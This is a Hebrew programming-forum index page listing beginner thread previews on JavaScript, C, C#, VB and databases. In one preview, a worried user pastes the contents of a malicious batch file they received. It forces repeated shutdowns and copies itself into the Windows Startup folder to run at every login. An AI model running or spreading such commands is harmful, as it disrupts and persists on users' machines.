עבור לתוכן
View in the app

A better way to browse. Learn more.

HWzone - פורומים

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

תכנות

פורום בנושא תכנות - C, Java, VB, פיתוח אתרי אינטרנט - HTML, CSS, ג'אווה סקריפט, PHP, ASP.NET ועבודה עם שרתים, מערכות ניהול, מאגרי מידע, חברות איחסון ושרותי תחזוקה.

1. Started by commander,

הרכבתי ב-javascript קוד לחישוב זמן, שעות דקות ושניות, אשר אותו הייתי רוצה בתור אפלקציית C או VB ככלי לשימוש. הנה קוד ה-javascript, אשמח אם חבר כאן יוכל לשלב זאת. העניין הוא ליצור מחשבון זמן, לדוגמא 1:22:04 ועוד 00:01:15 יהיה שווה 1:23:19 גללו את הקוד על דף HTML. בתודה. ------------------------------------------------------------------------------------------------------------------- <html dir=rtl> <SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript"> <!-- function addValues (value) { var myForm = document.timeCalculator; if(myForm.total_time.value.length > 0){ var the_hours = parseInt(myForm.total_time.value.substring(0,myForm.total_time.value.indexOf(…

2. Started by אלון פ,

שלום לכולם, אני צריך למשחק שהכנתי, שכשאוביקט מסויים פוגש באחר, האובייקט שהתנגשו בו הולך עם הראשון. לדוגמא: איש רץ וםפפוגש בכדור, ואז הכדור הולך לפניו כול הזמן. תודה לעוזרים! אלון

• 4 תגובות
    • 764 צפיות
  3. Started by BruceLee,

אז עשיתי חיפוש באתר פה וגם חיפשתי בגוגל מלא לא מצאתי פקודה שתעשה לי רענון רק לאחר שהדף נטען במלואו, וגם כל פעם שאני נכנס לדף הנ"ל (בין אם לחיצת משתמש, אוטמטי, קישור ישיר..) אני רוצה ריפרש אחד אוטמטי (ללא טיימר) כמו שעושים ידנית F5. אני משתמש בframe אז אני צריך משו לhead. תודה מראש

• 4 תגובות
    • 794 צפיות
  4. Started by matteo,

איפה אפשר ללמוד תכנות api בסיפיפי ספר או איזה משהו

• 4 תגובות
    • 694 צפיות
  5. ניסיתי בזמן ריצה ליצור טור לחצנים לדאטא גריד, זה הצליח, הבעייה הייתה כשניסיתי לשייך אותם למתודה כלשהי, בדאטא גריד יש מתודה שנקראת ItemCommand שאמורה להתבצע כל פעם שלוחצים על לחצן בדאטא גריד, אבל משום מה כשאני לוחץ על הלחצן בדאטא גריד שום דבר לא קורה .. הוא רק נכנס לפייג' לוד וזהו .. מישהו נתקל אי פעם בבעיה?

• 4 תגובות
    • 824 צפיות
  6. שלום, כיצד אני מוסיף לתוכנית win32 api אופצייה לבחירת מוזיקה ON או OFF ע"י Check Box או Radio Button? צריכה להיות עבור החלון הראשי. מדובר ב C++. בבקשה הסבר ולא לשלוח לינק ל win32 tutorial? תודה.

• 4 תגובות
    • 1k צפיות
  7. Started by the_lighting,

שלום חברים, לאחר חיפוש מצאתי כמה פוסטים במושא אך לא הבנתי את עניין הגבולות, ליצור מספר רנדומלי משתמשים בrand() אבל אני רוצה מספרים רנדומלים בין 100- ל 100, רק שלמים מסוג int איך אני מבצע את זה?

• 4 תגובות
    • 1.5k צפיות
  8. Started by sharonp,

אני יודע שזו אולי בקשה די גדולה, אבל מישהו מכיר סקריפט המגביל גודל תמונה בחתימה בפורומים?

• 4 תגובות
    • 510 צפיות
  9. מישהו שלח לי משהו ומרוב טיפשותי פתחתי זה היה ריסטרט של אחריי 60 שניות אבל שעשיתי ערוך לקובץ זה מה שהתקבל: SHUTDOWN -C you have a viros euch version 0.1 -T 20 -R V= f V= f W32.netsky.D@mm g h v C:\WINDOWS/system32 START euch.cmd START euch.bat SHUTDOWN -C you_have_virus_euch -T 55 -R START euch.bat COPY euch.cmd "C:\Documents and Settings\All Users\Start Menu\Programs\Startup חשוב שתדעו שלאחר שעשיתי ריסט זה לא חזר על עצמו.. אבל אני נורא דואג ואם תבקשו אעלה את הקובץ.

• 4 תגובות
    • 651 צפיות
  10. Started by rubiliani,

שלום.. מישהו יודע אם יש דרך לגבות DB של MySql דרך תוכנית?! אני צריך לכתוב תוכנית שעושה Backup וגם אפשרות ל-Restore.. תודה רבה! בבקשה אם אתם יכולים תעזרו זה ממש דחוף!!

• 4 תגובות
    • 846 צפיות
  11. Started by kisin,

שלום, ברשותי אתר שבניתי ואחרי מספר חודשים שצברתי לי כמות נכבדת של גולשים קבועים אני רוצה להוסיף לו פורום. אני יודע שיש מערכות פורומים מוכנות להורדה כמו: PhpBB, SMF ובטח יש עוד.... אבל הבעיה שלי היא שהאתר שלי כבר בנוי ואני רוצה פורום שיהיה לי "קל" לערוך אותו במידה כזאת כדי שיתאים לטבלאות מסד נתונים שלי. האם יש פורום להורדה שאתם ממליצים לי עליו שיהיה לי אפשרי "לשחק" עם הקוד כדי שיתאים לאתר שלי? ובכלל אני אשמח אם תכתבו לי פה עוד פורומים להורדה חוץ מהשתיים שרשמתי פה כדי שאני אוכל להתמצא יותר בתחום הזה של הפורומים. תודה מראש לכל מי שיעזור לי...

• 4 תגובות
    • 927 צפיות
  12. Started by eido300,

יש אפשרות לעצב מייל ששולחים דרך #c, אחרי ששיניתי את isBodyHtml ל-true, איך אפשר להוסיף תמונת רקע, או לסגנן את הכתב הרי לא עושים את זה בhtml? ניסיתי להשתמש בcss וזה לא ממש הלך (הוספתי את התגית background-image, וזה לא הוסיף תמונה, אבל יכול להיות שזה כי הוספתי את זה לא נכון, אני ממש לא יודע css).

• 4 תגובות
    • 1.4k צפיות
  13. Started by raiman1,

מה הכוונה ארגומנטים של שורת פקודה?(לאיזה שורת פקודה הם מתכוונים?) בספר ממנו אני לומד מביאים את התוכנית הבאה בתור דוגמא לשימוש בארגומנטים של שורת פקודה. using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace ConsoleApplication1 { class CommandLine { static void Main(string[] args) { int ctr = 0; if (args.Length <= 0) { Console.WriteLine("No Command Line arguments were provided"); return; } else { for(ctr=0;ctr<args.Length;ctr++) { Console.WriteLine("Argument {0} is {1}", ctr+1,args[ctr]); } } } } } הם הביאו שני קלטים…

• 4 תגובות
    • 2.9k צפיות
  14. שלום לכולם אוקיי, יש לי שאלה ... אני כותב בעזרת Visual basic 6, אני רוצה שהתוכנה שאני בונה לא תבדיל בין Capital letter לדוגמא: "Hello" אני רוצה שאם המחשב ימצא את המילה hello לא יעבור עלייה אלא יציג אותה (Hello = hello ) בכאילו... קראתי על משהו עם Ucase , אז איך אפשר? תודה!

• 4 תגובות
    • 556 צפיות
  15. Started by cheneilat,

היי

• 4 תגובות
    • 1.2k צפיות
  16. Started by mwalker03,

אני צריך להפעיל שלושה תרדים שיפעלו במקביל ושמישהו ישלוט עלייהם. זאת אומרת שמישהו אחד יוכל להפעיל אותם או להשהות אותם. לצורך כך אני חייב לסנכרן מידע בייניהם, זאת אומרת שכשאחד יעצור - 2 האחרים יעצרו גם כן. איזה מנגנונים פשוטים קיימים לסינכון ? איך אני יכול לתקוע THREAD לפי פקודה ואז שמישהו יגיד לו להמשיך מאותה הנקודה ? התוכנית כתובה ב C#.

• 4 תגובות
    • 2.2k צפיות
  17. Started by adlanm,

שלום על שרת FTP של win xp האם זה אפשרי בכלל? מצד לקוח, שרת? איך? תודה

• 4 תגובות
    • 1.2k צפיות
  18. אהלן חברים! לאחרונה התחלתי לעבור על החומר של C לקראת תחילת הלימודים. חיפשתי כבר שעות אחרי קומפיילר שיתאים לווינדוס 7, אך לא מצאתי משהו מתאים. למישהו יש לינק לקומפיילר שיתאים ל 7? הרמה שלי היא דיי בסיסית אם זה משנה משהו. תודה!

• 4 תגובות
    • 2.7k צפיות
  19. Started by Raamses,

בניתי סרבר וקליינט בC# הסרבר בCONSOLE הקליינט בWINFORM עכשיו אני רוצה להעביר את הסרבר שיהיה WINFORM גם. בקיצור בניתי את החלון עוד לא סיימתי את כל הדברים כמובן בגלל שנתקלתי בבעיה. הבעיה היא שכאשר אני מגיע לשורה Socket socket = listener.AcceptSocket(); החלון נתקע משום מה, כאשר הסרבר בקונסול הכל עובד מצוין ואני לא מצליח להבין מה אני לא עושה נכון, אם תוכלו לעזור לי אני אשמח. הנה הקוד של הרסבר (אני חייב לציין שאני רק לומד לתכנת ואני עושה הרוב לבד אז כל עזרה תהיה מבורכת, תודה מראש) using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using Communi…

• 4 תגובות
    • 934 צפיות
  20. Started by omerha,

היי, אני לא בטוח שזה המקום הנכון, אבל אשמח אם מישהו יכול לעזור לי, אני צריך לייצא כמה טבלאות שנמצאות על שרת SQL על DB אחד מתוך איזה 10 DB תודה

• 4 תגובות
    • 6.6k צפיות
  21. שלום, כיצד אני יכול ב-Visual Basic לשלוח נתונים להתקן כלשהו שמחובר ב-USB?

• 4 תגובות
    • 665 צפיות
  22. Started by ac1240,

אני יצרתי תיקייה WEB שאלייה אני מעלה קבצים ברגע שאני מעלה קובץ באתר שלי שהוא בנוי ב (VB.NET) הקובץ מגיע לתיקיית ה WEB שלי ואני רוצה שהוא יכנס לי לתוך מסד הנתונים(הלינק שלו) והמסד יביא לי באתר את הכתובת של הלינק בתוך חלון (שבוא הוא ישמור את הנתונים טאני מאמין שצריך טבלה בנוסף) השאלה שלי איך עושים את זה?

• 4 תגובות
    • 786 צפיות
  23. דיאלוגים הכוונה זה החלונות האלה שקופצים ויש קלט\פלט אני צריך את זה בשביל לקלוט את השם של השחקן ובסיום המשחק להחזיר אותו ואת המוזיקה אני רוצה לשלב למהלך המשחק תודה מראש

• 4 תגובות
    • 1.2k צפיות
  24. בניתי מערכת תגובות למנהל, התגובות מגיעות למסד נתונים והמנהל צופה בהם מתוך דף מנהל מעוצב. הבעיה בהתקשרות לדטהבייס מתרחשת רק במחשב שלי, ואם אני מעלה את הקבצים לאתר אחסון, הכל עובד מצוין. אני רוצה לפתור את הבעיה אצלי במחשב שאני חושד שמקורה ברמת האבטחה/הרשאה של access למשתמשים. אני זוכר שפעם לחבר שלי הייתה בעיה כזו וסידרתי לו אותה על ידי שינוי רמת האבטחה, אך אני לא זוכר איך. אם מישהו יודע איך להגיע לשינוי רמת האבטחה של מסד הנתונים, או שיש לו דעה שונה לגבי הבעיה. מצורף פרינט סקרין לבעיה: http://img300.imageshack.us/img300/466/problemdz5.jpg (לא שמתי את התמונה ישר באשכול כי היא נחתכת) תודה רבה חברים, זה חשוב מאוד. עריכה: בעיית האבטחה שעליה דיב…

• 4 תגובות
    • 905 צפיות
  25. Started by AnTiSh0ck,

אני מתחיל בכל העניין, אבל עדיין לא מבין למה לא הולך לי בתרגיל הזה. אני לומד את השפה דרך הספר "המדריך השלם לשפת C" הוצאה שנת 1998 התרגיל: קלוט מספרים חיוביים או שליליים ומצא את המקסימלי מביניהם. יש לקלוט עד שיקלט המספר 0 או עד 5 מספרים לכל היותר. התרגיל בא אחרי חומר על לולאת while אז צריך לבצע את התרגיל בעזרתו. הקוד: #include "stdafx.h" #include <stdio.h> void main() { int i=0, top=0, input=1 ; while(i<=4 && input!=0) { printf("enter a number: "); scanf("%d", &input); if(input>top) top=input; i=i+1; } printf("the biggest number is: %d", &top); } אני משתמש ב visual c++ 2008 בגלל זה יש את הספריה הראשונה. מה שקו…

• 4 תגובות
    • 973 צפיות

דיונים חדשים בפורומים

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.